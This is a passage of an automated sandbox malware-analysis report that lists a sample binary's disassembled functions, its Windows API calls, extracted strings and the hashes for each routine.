                                                    • String ID: 3cf$_f
                                                    • API String ID: 2620147621-1617663849
                                                    • Opcode ID: 45393f6719d0d4143b5e8b3e86dc2490c01b81bb75c7d26ce5bf114de62f3fea
                                                    • Instruction ID: a4151c710ad60b7849b1744439703f1062cfd74bf7884c8ac124014096d4142d
                                                    • Opcode Fuzzy Hash: 45393f6719d0d4143b5e8b3e86dc2490c01b81bb75c7d26ce5bf114de62f3fea
                                                    • Instruction Fuzzy Hash: B8514A716083518FDB65CF28C991B6ABBE6AF85314F08882DE989D7351DB31E901CB92
                                                    Function 00666192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: 3cf$ERCP
                                                    • API String ID: 2532777613-1293920239
                                                    • Opcode ID: 907f5e22ce5a8ef4676971dadab6dbfe5dc89204bee9ff57d7180fc1377baf6c
                                                    • Instruction ID: 5aebc303d4b4182e4104ed7b2c4579125fc0cb628a06b8d433f32f49caf41c34
                                                    • Opcode Fuzzy Hash: 907f5e22ce5a8ef4676971dadab6dbfe5dc89204bee9ff57d7180fc1377baf6c
                                                    • Instruction Fuzzy Hash: 0951B171900305DBDB24DF65D891BEAB7EAEF44304F20856EE54AD7281E770EA45CB40
                                                    Function 006A97F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A9296,?,?,00000034,00000800,?,00000034), ref: 006B14E6
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006A983F
                                                      • Part of subcall function 006B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006B14B1
                                                      • Part of subcall function 006B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 006B1409
                                                      • Part of subcall function 006B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B1419
                                                      • Part of subcall function 006B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B142F
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006A98AC
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006A98F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @$@U=u
                                                    • API String ID: 4150878124-826235744
                                                    • Opcode ID: 57570a010b70e79185d75d3716ee28e0cb8d5e25899395e13b5449fd11a0d5a3
                                                    • Instruction ID: 2616045b9582ff045cbddf065d3ec4609ab389ea3f23792b17bbd29a4e066bdf
                                                    • Opcode Fuzzy Hash: 57570a010b70e79185d75d3716ee28e0cb8d5e25899395e13b5449fd11a0d5a3
                                                    • Instruction Fuzzy Hash: 93414176901118BFDB10DFA4CC51ADEBBB9EB06300F144159F945B7191DA716E85CFA0
                                                    Function 006B2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B27C0
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006B27DC
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 006B2822
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00715890,00000000), ref: 006B286B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: ea5966cb52cb201f82e5c098d4d87821c85a1e50063def5888e2aaea0d31265c
                                                    • Instruction ID: d9c776e45f497140f6f2718995c5ea6d7789c25c2449738aae7799fd50dc24ae
                                                    • Opcode Fuzzy Hash: ea5966cb52cb201f82e5c098d4d87821c85a1e50063def5888e2aaea0d31265c
                                                    • Instruction Fuzzy Hash: 6E41B2B06043029FD720DF24DC94B9ABBEAEF85314F044A2DF96697392D730E949CB56
                                                    Function 006DAB37 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 006DAB60
                                                    • GetWindowRect.USER32(?,?), ref: 006DABD6
                                                    • PtInRect.USER32(?,?,006DC014), ref: 006DABE6
                                                    • MessageBeep.USER32(00000000), ref: 006DAC57
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID: hW
                                                    • API String ID: 1352109105-1300829777
                                                    • Opcode ID: 35041d8dc1731841c2a54437166b0f3bd49ae59b90da81f8ffac4f1379b2a030
                                                    • Instruction ID: b737a87de2b5e0ecabb53f17e9dd6d467bb066926dd89a1c6e86dfb47a223c43
                                                    • Opcode Fuzzy Hash: 35041d8dc1731841c2a54437166b0f3bd49ae59b90da81f8ffac4f1379b2a030
                                                    • Instruction Fuzzy Hash: A1416034E14119DFCB25DF98D884BA97BF6FB49320F1880AAE4159B361D730E942CB92
                                                    Function 006CD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006CD7C5
                                                      • Part of subcall function 0065784B: _memmove.LIBCMT ref: 00657899
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower_memmove
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 3425801089-567219261
                                                    • Opcode ID: e77379db521bc433194a0ac2d2c2aded6dd32a862bb058be5cb8afa8aad8e805
                                                    • Instruction ID: 9bf6d8a586d87acf1ad34adf2205887f3e649376979c7691359281a83d0f0f59
                                                    • Opcode Fuzzy Hash: e77379db521bc433194a0ac2d2c2aded6dd32a862bb058be5cb8afa8aad8e805
                                                    • Instruction Fuzzy Hash: 5B318E71905219ABDF00EF54CC51AFEB3B6FF04720F10862DE865976D2DB31A905CB90
                                                    Function 006C182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006C184C
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006C1872
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006C18A2
                                                    • InternetCloseHandle.WININET(00000000), ref: 006C18E9
                                                      • Part of subcall function 006C2483: GetLastError.KERNEL32(?,?,006C1817,00000000,00000000,00000001), ref: 006C2498
                                                      • Part of subcall function 006C2483: SetEvent.KERNEL32(?,?,006C1817,00000000,00000000,00000001), ref: 006C24AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 34ccf4dbd180e5551ef0015a118a4548d300003ac215eaad6c62761484ad38b9
                                                    • Instruction ID: 5759cd2188eadbe53576af421d443513a7282a0f7829da99b5b563bc9091017f
                                                    • Opcode Fuzzy Hash: 34ccf4dbd180e5551ef0015a118a4548d300003ac215eaad6c62761484ad38b9
                                                    • Instruction Fuzzy Hash: 5821AFB1505209BFEB11AB60DC85FFB77EEEB4A744F10412EF9059A241DA208E0557A4
                                                    Function 006DC498 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • GetCursorPos.USER32(?), ref: 006DC4D2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0068B9AB,?,?,?,?,?), ref: 006DC4E7
                                                    • GetCursorPos.USER32(?), ref: 006DC534
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0068B9AB,?,?,?), ref: 006DC56E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID: hW
                                                    • API String ID: 2864067406-1300829777
                                                    • Opcode ID: 583c3d4c9f932e906d9e41e344714cc91b7e04c26c92f64fe7c654a5baf3dc38
                                                    • Instruction ID: 48a66b4b109b13b234ec2e11acc6e3c638c0c971c14cb0382aa8767c074e5d74
                                                    • Opcode Fuzzy Hash: 583c3d4c9f932e906d9e41e344714cc91b7e04c26c92f64fe7c654a5baf3dc38
                                                    • Instruction Fuzzy Hash: 3D31A735910018EFCB15CF98D854EFA7BB6EB49320F04406AF905873A1C7356D61DF94
                                                    Function 006D63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
                                                      • Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
                                                      • Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006D6461
                                                    • LoadLibraryW.KERNEL32(?), ref: 006D6468
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006D647D
                                                    • DestroyWindow.USER32(?), ref: 006D6485
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 102349ad2dee82a792ef2ea3128365d6ad7cc384872145159126417f32ba2ada
                                                    • Instruction ID: 310741ef8931bb9a00e43aae1740b951a07170c7db3bfcacef6bb8ac5a2eab45
                                                    • Opcode Fuzzy Hash: 102349ad2dee82a792ef2ea3128365d6ad7cc384872145159126417f32ba2ada
                                                    • Instruction Fuzzy Hash: D7215B71A00205AFEF104F64DC80EBB77EAEF59368F10962AFA50962A0D775DC5197A0
                                                    Function 006B6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006B6DBC
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006B6DEF
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006B6E01
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006B6E3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: e57b6157ab0f0d21248f70ebd671838a88a4bd0a109ce6d0bd4a89516fb4a09c
                                                    • Instruction ID: dbaf95bdec2d75017bff12bb2a68c03fa6173bc114e5787ed68b13f15d6c14c3
                                                    • Opcode Fuzzy Hash: e57b6157ab0f0d21248f70ebd671838a88a4bd0a109ce6d0bd4a89516fb4a09c
                                                    • Instruction Fuzzy Hash: D721A4B4600209ABDB209F69DC04ADA7BF6EF44720F204A29FCA1D73D0D774D991CB54
                                                    Function 006B6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 006B6E89
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006B6EBB
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 006B6ECC
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006B6F06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 0aa91fc3abeb3bcf584c04f064fa3fbfb592a5bb4bd8ae7e6c8015f37b393e37
                                                    • Instruction ID: ead6097a8585867a471caae604fec565eafbd201af9c678a0c6da6fcf14042eb
                                                    • Opcode Fuzzy Hash: 0aa91fc3abeb3bcf584c04f064fa3fbfb592a5bb4bd8ae7e6c8015f37b393e37
                                                    • Instruction Fuzzy Hash: 1221B0B95043059BDB209F69CC04AEA77AAEF45724F200A1AF9A1D33D0D774E9828B50
                                                    Function 006BAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BAC54
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006BACA8
                                                    • __swprintf.LIBCMT ref: 006BACC1
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,006DF910), ref: 006BACFF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 9525cc05fff30d925a433032847e1a1ffad3a09b1f98c92eb8cb4612eeb8cb66
                                                    • Instruction ID: 5bb6c7f37663b68f5505f5a61ab29d1bf2f16ffd9289edcd10222380f26acbb1
                                                    • Opcode Fuzzy Hash: 9525cc05fff30d925a433032847e1a1ffad3a09b1f98c92eb8cb4612eeb8cb66
                                                    • Instruction Fuzzy Hash: E3217F70A00209EFCB50EFA4CD45DEE7BB9EF49715B0040A9F909AB351DB31EA45CB21
                                                    Function 006B1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B115F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B1184
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B118E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,006AFCED,?,006B0D40,?,00008000), ref: 006B11C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID: @k
                                                    • API String ID: 2875609808-3759510095
                                                    • Opcode ID: c286c54e598bc57f89b5ef8c70e71ebbda9e4303c202afc23f10f05f1f049ddd
                                                    • Instruction ID: 41471d99c2cfb2e182f7156e4f1173f454b6d934999cc0521711935974ae1ea0
                                                    • Opcode Fuzzy Hash: c286c54e598bc57f89b5ef8c70e71ebbda9e4303c202afc23f10f05f1f049ddd
                                                    • Instruction Fuzzy Hash: 0A118E71C0151CE7CF00DFA8D858AEEBB7AFF0A711F404066EA41BA240CB709590CBA5
                                                    Function 006DACCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,007157B0,006DD809,000000FC,?,00000000,00000000,?,?,?,0068B969,?,?,?,?,?), ref: 006DACD1
                                                    • GetFocus.USER32 ref: 006DACD9
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • SendMessageW.USER32(00E1DB70,000000B0,000001BC,000001C0), ref: 006DAD4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$FocusForegroundMessageSend
                                                    • String ID: @U=u$hW
                                                    • API String ID: 3601265619-4076565667
                                                    • Opcode ID: 00cd3739d8bd75765344266806593b0ba2eb8516cbb95245657244891f026036
                                                    • Instruction ID: 0d412d017c04c33c5eabbeab7667aceaf1500b78486825aa4a4c7d797dd23057
                                                    • Opcode Fuzzy Hash: 00cd3739d8bd75765344266806593b0ba2eb8516cbb95245657244891f026036
                                                    • Instruction Fuzzy Hash: D7014031A055009FC7159B28D898AE577E7EF8A321F18427EF826877F1DB31AC46CB51
                                                    Function 006CEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006CEC07
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006CEC37
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006CED6A
                                                    • CloseHandle.KERNEL32(?), ref: 006CEDEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 64240ba2d6a3f0dd14d842798266152940dd8ee6793d290f10cbe85a79335b34
                                                    • Instruction ID: 928578697a35558513d27db63c009204e4f74dba44821ee0db1f5cc95a6c5330
                                                    • Opcode Fuzzy Hash: 64240ba2d6a3f0dd14d842798266152940dd8ee6793d290f10cbe85a79335b34
                                                    • Instruction Fuzzy Hash: 008181716007009FD760EF28C846F6AB7E6EF84710F04891DF99A9B392D7B1AD44CB95
                                                    Function 006D0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 006D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006CFDAD,?,?), ref: 006D0E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D00FD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D013C
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006D0183
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 006D01AF
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D01BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
